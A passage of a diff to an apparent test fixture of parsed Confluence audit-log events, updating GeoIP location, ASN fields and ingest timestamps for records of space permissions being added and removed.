user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"COMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -5247,20 +4941,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -5268,7 +4956,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222470096Z", + "ingested": "2021-12-14T14:34:31.513222664Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.584Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"COMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -5353,20 +5041,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -5374,7 +5056,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222471994Z", + "ingested": "2021-12-14T14:34:31.513223111Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.580Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"COMMENT\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -5459,20 +5141,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -5480,7 +5156,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222473873Z", + "ingested": "2021-12-14T14:34:31.513223587Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.575Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"COMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -5558,20 +5234,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -5579,7 +5249,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222475758Z", + "ingested": "2021-12-14T14:34:31.513224034Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.571Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEOWNCONTENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -5664,20 +5334,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -5685,7 +5349,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222477662Z", + "ingested": "2021-12-14T14:34:31.513224465Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.567Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEOWNCONTENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -5770,20 +5434,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -5791,7 +5449,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222479553Z", + "ingested": "2021-12-14T14:34:31.513224873Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.556Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEOWNCONTENT\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -5876,20 +5534,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -5897,7 +5549,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222481453Z", + "ingested": "2021-12-14T14:34:31.513225335Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.454Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEOWNCONTENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -5975,20 +5627,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -5996,7 +5642,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222483343Z", + "ingested": "2021-12-14T14:34:31.513225778Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.444Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"VIEWSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -6081,20 +5727,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -6102,7 +5742,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222485236Z", + "ingested": "2021-12-14T14:34:31.513226163Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.435Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"VIEWSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -6187,20 +5827,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -6208,7 +5842,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222487138Z", + "ingested": "2021-12-14T14:34:31.513226664Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.424Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"VIEWSPACE\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -6293,20 +5927,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -6314,7 +5942,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222489030Z", + "ingested": "2021-12-14T14:34:31.513227049Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.404Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"VIEWSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -6394,20 +6022,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -6415,7 +6037,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222490927Z", + "ingested": "2021-12-14T14:34:31.513227546Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.393Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"VIEWSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -6488,20 +6110,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -6509,7 +6125,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222492821Z", + "ingested": "2021-12-14T14:34:31.513228323Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.375Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"VIEWSPACE\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -6582,20 +6198,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -6603,7 +6213,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222494699Z", + "ingested": "2021-12-14T14:34:31.513228709Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.366Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"VIEWSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -6676,20 +6286,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -6697,7 +6301,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222496582Z", + "ingested": "2021-12-14T14:34:31.513229122Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.361Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"COMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -6770,20 +6374,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -6791,7 +6389,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222498490Z", + "ingested": "2021-12-14T14:34:31.513229514Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.357Z\",\"author\":{\"name\":\"test 